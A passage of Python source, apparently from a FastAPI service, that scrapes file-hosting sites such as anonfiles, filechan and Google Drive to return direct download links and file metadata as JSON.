a = str(a_href) | |
id = link.split("/", 5)[4] | |
a_byte = soup.find("a", {"class": "input popsok"}).get_text() | |
a_name = soup.find("div", {"class": "dl-btn-label"}).get_text() | |
details = soup.find("ul", {"class": "details"}) | |
li_items = details.find_all("li")[1] | |
some = li_items.find_all("span")[0].get_text().split() | |
dat = list(some) | |
down = a_byte.replace(" ", "").strip() | |
time = dat[1] | |
date = dat[0] | |
byte = down.split("(", 1)[1].split(")", 1)[0] | |
name = a_name.replace(" ", "").strip() | |
return { | |
"status": "true", | |
"data": { | |
"file": { | |
"url": { | |
"directDownload": a, | |
"original": link, | |
}, | |
"metadata": { | |
"id": id, | |
"name": name, | |
"size": {"readable": byte}, | |
"DateAndTime": {"time": time, "date": date}, | |
}, | |
} | |
}, | |
} | |
except BaseException: | |
return "{'status': 'false', 'message': 'Invalid Link'}" | |
def gdrive(link: Union[str, None] = None): | |
try: | |
down = link.split("/", 6) | |
url = f"https://drive.google.com/uc?export=download&id={down[5]}" | |
session = requests.Session() | |
response = session.get(url, stream=True) | |
headers = response.headers | |
content_disp = headers.get("content-disposition") | |
filename = None | |
if content_disp: | |
match = re.search(r'filename="(.+)"', content_disp) | |
if match: | |
filename = match.group(1) | |
content_length = headers.get("content-length") | |
last_modified = headers.get("last-modified") | |
content_type = headers.get("content-type") | |
return { | |
"status": "true", | |
"data": { | |
"file": { | |
"url": { | |
"directDownload": url, | |
"original": link, | |
}, | |
"metadata": { | |
"id": down[5], | |
"name": ( | |
filename | |
if filename | |
else "No filename provided by the server." | |
), | |
"size": { | |
"readable": ( | |
f"{round(int(content_length) / (1024 * 1024), 2)} MB" | |
if content_length | |
else "No content length provided by the server." | |
), | |
"type": ( | |
content_type | |
if content_type | |
else "No content type provided by the server." | |
), | |
}, | |
"DateAndTime": ( | |
last_modified | |
if last_modified | |
else "No last modified date provided by the server." | |
), | |
}, | |
} | |
}, | |
} | |
except BaseException: | |
return "{'status': 'false', 'message': 'Invalid Link'}" | |
def anonfiles(link: Union[str, None] = None): | |
try: | |
r = requests.get(link) | |
soup = BeautifulSoup(r.content, "html.parser") | |
a_href = soup.find("a", {"id": "download-url"}).get("href") | |
a = str(a_href) | |
id = link.split("/", 4)[3] | |
jsondata = requests.get(f"https://api.anonfiles.com/v2/file/{id}/info").json() | |
jsondata["data"]["file"]["url"]["directDownload"] = a | |
del jsondata["data"]["file"]["url"]["full"] | |
return jsondata | |
except BaseException: | |
return "{'status': 'false', 'message': 'Invalid Link'}" | |
def filechan(link: Union[str, None] = None): | |
try: | |
r = requests.get(link) | |
soup = BeautifulSoup(r.content, "html.parser") | |
a_href = soup.find("a", {"id": "download-url"}).get("href") | |
a = str(a_href) | |
id = link.split("/", 4)[3] | |
jsondata = requests.get(f"https://api.filechan.org/v2/file/{id}/info").json() | |
jsondata["data"]["file"]["url"]["directDownload"] = a | |
del jsondata["data"]["file"]["url"]["full"] | |
return jsondata | |
except BaseException: | |
return "{'status': 'false', 'message': 'Invalid Link'}" | |
def letsupload(link: Union[str, None] = None): | |
try: | |
r = requests.get(link) | |
soup = BeautifulSoup(r.content, "html.parser") | |
a_href = soup.find("a", {"id": "download-url"}).get("href") | |
a = str(a_href) | |
id = link.split("/", 4)[3] | |
jsondata = requests.get(f"https://api.letsupload.cc/v2/file/{id}/info").json() | |
jsondata["data"]["file"]["url"]["directDownload"] = a | |
del jsondata["data"]["file"]["url"]["full"] | |
return jsondata | |
except BaseException: | |
return "{'status': 'false', 'message': 'Invalid Link'}" | |
def megaupload(link: Union[str, None] = None): | |
try: | |
r = requests.get(link) | |
soup = BeautifulSoup(r.content, "html.parser") | |
a_href = soup.find("a", {"id": "download-url"}).get("href") | |
a = str(a_href) | |
id = link.split("/", 4)[3] | |
jsondata = requests.get(f"https://api.megaupload.nz/v2/file/{id}/info").json() | |
jsondata["data"]["file"]["url"]["directDownload"] = a | |
del jsondata["data"]["file"]["url"]["full"] | |
return jsondata | |
except BaseException: | |
return "{'status': 'false', 'message': 'Invalid Link'}" | |
def myfile(link: Union[str, None] = None): | |
try: | |
r = requests.get(link) | |
soup = BeautifulSoup(r.content, "html.parser") | |
a_href = soup.find("a", {"id": "download-url"}).get("href") | |
a = str(a_href) | |
id = link.split("/", 4)[3] | |
jsondata = requests.get(f"https://api.myfile.is/v2/file/{id}/info").json() | |
jsondata["data"]["file"]["url"]["directDownload"] = a | |
del jsondata["data"]["file"]["url"]["full"] | |
return jsondata | |
except BaseException: | |
return "{'status': 'false', 'message': 'Invalid Link'}" | |
def custom_exception_handler(request: Request, exc: HTTPException) -> JSONResponse: | |
error_detail = [{"error": str(exc.detail)}] | |
custom_error_model = CustomErrorResponseModel(detail=error_detail) | |
return JSONResponse( | |
status_code=exc.status_code, | |
content=custom_error_model.dict(), | |
headers=exc.headers, | |
) | |
# Add the custom exception handler to your FastAPI app | |
app.add_exception_handler(HTTPException, custom_exception_handler) |